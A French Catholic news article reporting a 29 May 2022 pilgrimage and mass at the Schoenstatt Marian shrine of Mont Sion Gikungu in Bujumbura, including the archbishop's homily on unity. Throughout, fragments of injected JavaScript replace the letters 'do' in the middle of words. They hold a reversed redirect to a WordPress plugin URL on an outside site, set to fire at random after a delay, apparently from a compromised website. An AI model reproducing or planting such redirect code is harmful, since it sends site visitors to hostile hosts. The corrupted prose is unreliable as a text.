La vraie unité toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne aux hommes leur dignité, construit un monde meilleur, un beau Burundi, le Burundi des rachetés, un parent qui nous aime tous.
L’archevêque de Bujumbura, Monseigneur Gervais BANSHIMIYUBUSA a célébré le septième dimanche de Pâques en date du 29 mai 2022, correspondant à la clôture du Mois Marial au Sanctuaire Marial de la Paix et la Réconciliation de Schoenstatt au Mont Sion Gikungu. La messe a commencé par le rassemblement des Pèlerins, Chrétiens et membres des Mouvements d’Actions Catholiques, accompagnés des Abbés Janvier Nizigiyimana, Secrétaire Exécutif de la Coordination Diocésaine de l’Apostolat des des Laïcs (CDAL) dans l’Archidiocèse de Bujumbura et de son adjoint, Déo Tuhabonye.
La marche-procession a commencé aux environs de l’Hôpital Militaire à 9h00 et les Pèlerins, joyeux, chantant et dansant au rythme des tambours se sont progressivement dirigés vers le Sanctuaire Marial. Arrivés au Sanctuaire, les MAC ont été accueillis à l’entrée par le Vice-Recteur, le Père Floribert KANEZA accompagné des fidèles de Mont Sion Gikungu qui ont conclu l’alliance d’amour samedi, le 28 mai 2022 dans la messe de 11 heures avec la Vierge Marie. Ils portaient un bouquet de fleur et l’Image de la Vierge Pèlerine qui venait de passer tout le mois de mai visitant différentes familles.
Dans une ambiance festive de tambour, tambourines, trompettes, chansons mariales et danses, le Père Vice-Recteur, les Abbés Janvier Nizigiyimana et Déo Tuhabonye en compagnie de quelques fidèles sont allés déposer la Vierge Pèlerine au Sanctuaire avant le début de l’eucharistie.
La messe a vu la participation de l’Archevêque de Bujumbura, Monseigneur Gervais Banshimiyubusa, l’Archevêque Émérite, Monseigneur Évariste NGOYAGOYE et de nombreux personnalités, pèlerins et fidèles. La messe était animée par la Chorale du Mouvement Marial et la Chorale Sainte Maria Goretti du Sanctuaire Mont Sion Gikungu. Les saintes Écritures du jour étaient tirées de la première lecture des Ac7, 55-60, du Psaume Responsorial 97, 1-2b. 6-7c. 9, de la deuxième lecture des Ap 22, 12-14. 16-17.20 ainsi que de l’évangile de Jean Jn 17, 20-26.
Dans un mot d’accueil, le Vice-Recteur du Sanctuaire a chaleureusement souhaité la bienvenue à l’Archevêque, aux membres de la CDAL accompagnés des prêtres en charge de sa coordination ainsi qu’aux pèlerins. Il a indiqué que c’est devenu une bonne habitude pour les membres de la CDAL et autres pèlerins de clôturer le mois marial par un pèlerinage au Sanctuaire Marial de Schoenstatt de Mont Sion Gikungu.
Il leur a souhaité de passer un bon moment au sanctuaire. Il a par la suite fait savoir que le mois marial a été une occasion de dire le rosaire au Sanctuaire. Il a invité les chrétiens de se consacrer à la Mère Trois fois Admirable à la fin de la messe pour qu’elle continue à prier pour la paix. Il a rappelé que ce mois a été aussi une occasion pour la Vierge Pèlerine de visiter plusieurs familles, pour prier pour la paix des familles. Une bonne occasion de glorifier Dieu avec Marie, quand elle dit :« Mon âme exalte le Seigneur », elle a ainsi renforcé notre foi, ce qui est le signe de l’amour et l’unité.
Le Vice-Recteur a terminé son allocution en exhortant tous les chrétiens de prier pour notre Évêque et notre Archidiocèse en passant par la Mère Trois fois Admirable.
Au début de l’eucharistie, l’Archevêque BANSHIMIYUBUSA répondant d’abord au mot de bienvenu a dit qu’il est très reconnaissant de l’accueil chaleureux au Sanctuaire Marial et que le Père Floribert a rappelé, à juste titre, la raison d’être de ce jour. Il a rappelé à chacun sa prière à Dieu en passant par la Vierge Marie et comme une famille dans l’Archidiocèse, nous devons avoir une prière commune à offrir à Dieu a-t-il conclu.
Dans son homélie, l’Archevêque BASHIMIYUBUSA a rappelé aux chrétiens et surtout aux membres des Mouvements d’Actions Catholiques (MAC) qu’au début de ce mois, beaucoup s’étaient retrouvés au même Sanctuaire Marial de Mont Sion Gikungu pour glorifier Dieu avec Marie. Nous sommes alors revenus atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorer davantage pour clôturer ce mois dédié à Marie, a-t-il poursuivi. Je vous remercie beaucoup surtout les membres des MAC pour ce pèlerinage que vous avez fait avec les prêtres que j’ai mis devant vous à savoir les Abbés Janvier et Abbé, a-t-il lancé. Il a aussi remercié les prêtres et religieux ainsi que les chrétiens qui aident les MAC, sans oublier tous les pèlerins rassemblés à ce Lieu Saint et a souhaité à tous de rencontrer la grâce du Seigneur.
« Que tous soient un, ... Qu’ils soient un en nous, eux aussi, pour que le monde croie que tu m’as envoyé», Jn 17, 21. Notre prière commune toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être la grâce du toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don de l’unité et d’amour, a recommandé l’Archevêque Banshimiyubusa. Dans les saintes écritures du jour, les mots « unité » et « amour » reviennent plusieurs fois comme un signe fort, c’est d’ailleurs le signe que Jésus Christ a laissé à ses disciples avant de souffrir sa passion. Jésus a ajouté qu’il faut que ses disciples soient un, leur unité sera un signe pour que le monde croit. Lorsque nous sommes unis, nous sommes en train de témoigner pour le Christ. Nous devons également comprendre que nous avons une très grande responsabilité devant le monde puisque nous devons amener le monde à croire en Lui, a -t- il martelé.
Mais il y a plusieurs sortes d’unités, cependant a -t-il poursuivi, l’unité qui cherche des intérêts matériels ou autre chose est vaine, cette unité ne tient pas longtemps. De nos jours, il y a des gens qui se mettent ensemble pour faire du mal mais cette unité à base du mal ne dure pas. La vraie unité prend racine dans le Père qui est en définitive l’origine de tous : du Dieu Fils et Saint Esprit « Qu’ils soient un comme nous sommes UN », Jn 17, 22.
La vraie unité toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit alors se baser sur la vraie force, Le Dieu que les Israéliens appellent l’origine de la terre et du ciel, c’est ce qui est dit dans la révélation faite à Jean, « Moi, je suis l’alpha et l’oméga, le premier et le dernier, le commencement et la fin » Ap 22, 13. Nous avons tout en commun, les mêmes origines, nous venons de Lui et nous retournerons dans son palais comme Etienne pour être récompensé.
« Mais lui, rempli de l’Esprit Saint, fixait le ciel du regard : il vit la gloire de Dieu, et Jésus debout à la droite de Dieu », Ac 7, 55 et Jésus dit :« Voici que je viens sans tarder et j’apporte avec moi le salaire que je vais toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner à chacun selon ce qu’il a fait » Ap22, 12. Nous avons tous un même parent raison pour laquelle, comme Etienne, nous devons prier même pour ceux qui nous font du mal. « Seigneur, ne leur compte pas ce péché », Ac7, 60 pour que même celui-ci soit sauvé puisque nous avons la même origine et destination, a dit l’Archevêque de Bujumbura.
La vraie unité c’est celle unité qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne aux hommes leur dignité, qui fait du bien, comme cela, nous construirons un monde meilleur, un beau Burundi, le Burundi des rachetés, un parent qui nous aime tous.
Faisons alors une introspection pour voir si nous avons gardé cette unité que Jésus Christ nous a laissé, a-t-il recommandé. A commencer par l’Église, est-ce que nous avons gardé cette unité ? Que cherchons-nous dans toutes ces sectes ? Cette multitude d’églises qui se réclament du Christ, de quel Christ en réalité se réclament-elles, s’est exclamé et interrogé l’Archevêque. La seule vraie voie est que nous acceptions d’être guidé par le Saint Esprit, sinon tout autre chose serait une simulation, même les dialogues seront vains. Nous devons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc accepter que le Saint Esprit nous guide et nous a emmené là où est l’Agneau de Dieu qui est mort et ressuscité. Il faut aussi savoir que la première Église est le foyer familial, alors la question est de savoir si on voit l’unité là où on vit, avec les enfants, l’épouse, les voisins proches et éloignés, etc.
N’oubliez jamais que vous partagez un bon parent qui nous aime et partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne tous. Jésus Christ nous a laissé l’unité et l’amour pour qu’ils nous caractérisent partout, il faut honorer son héritage. Dans le pays, où nous partagions tout, que jamais seuls les puissants profitent des biens du pays mais que nous soyons un seul peuple, a conclu son homélie l’archevêque.
Construisons un pays digne d’être appelé « propriété de Dieu » sans se tromper, un pays que Jésus a conquis. Que la Vierge Marie, que nous célébrons aujourd’hui, nous aide à construire ensemble un bon Burundi, caractérisé par l’amour et l’unité entre les enfants de Dieu.
Dans la suite de la messe, l’offertoire a été une belle occasion pour manifester la joie et la gratitude à la Vierge Marie dans des symboles et offrandes en nature. Le premier signe était un bouquet de fleurs de couleurs variées, offert par les membres de CDAL, comme signe de différents sacrifices mais aussi différents toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons qui se manifestent à travers différents MAC et groupes d’apostolat.
Le deuxième signe était un panier contenant 7 (le chiffre 7 était biblique) sortes de graines cultivées au Burundi comme signe de gratitude pour tous les biens reçus durant ce mois marial, un mois correspondant à la saison de récolte. Ces 7 sortes de graines rappellent aussi la période de cénacle où il est attendu les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons de l’Esprit Saint pour avoir plus de Fruits.
Le troisième signe était le globe terrestre qui rappelle la fraternité universelle et l’unité entre peuples avec une pensée particulière pour les pays en guerre, surtout la Russie et l’Ukraine.
Le quatrièmement signe était la Bible offerte et ouverte sur une corbeille par les chrétiens de Mont Sion Gikungu, signe que la parole de Dieu se reçoit comme nourriture que nous mangeons et que nous désirons que Dieu nous nourrisse de sa parole chaque jour.
En plus, il y a eu des offrandes en natures, offertes par les familles qui ont accueilli l’image de la Vierge Marie pendant ce mois de Mai.
Enfin il y a eu les offrandes de l’autel : six corbeilles portées par 3 jeunes filles CDAL et 3 jeunes filles Mont Sion Gikungu.
Avant la clôture de l’eucharistie, l’Abbé Janvier Nizigiyimana, chargé de CDAL a exprimé sa gratitude à l’endroit de l’Archevêque de Bujumbura pour son indéfectible soutien au Conseil. Il a également remercié les responsables du Sanctuaire Marial de la Paix et la Réconciliation et à tous ceux qui se sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés corps et âme (Organisateurs, police, chorales, etc.) pour la réussite de la cérémonie du jour.
Il a rappelé qu’on est encore en neuvaine avec Marie pour apprendre de ses bonnes habitudes et de préciser qu’il y’ a une relation très forte entre Marie et MAC. Il a rappelé aux fidèles qu’ils devraient rentrer avec deux choses comme MAC : l’obéissance et l’unité.
Marie a toujours dit oui dans sa mission de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner au monde un sauveur, nous devons avoir une unité qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit persister à toutes les épreuves, non pas l’unité bâtie sur l’argent ou les avantages politiques. Que les MAC accomplissent leur apostolat sous le guide du Saint Esprit, a-t-il conclu.
Signalons que la messe a été clôturée par une marche-procession en direction du sanctuaire sous le résonnement du tambour royal et la performance des Danseurs Intore. Après y avoir recité 3 « Je vous salue Marie », la prière de se consacrer à la Vierge, la prière de couronnement de la Vierge, les fidèles ont reçu la bénédiction solennelle de l’Archevêque.
Fulgence Ndayizeye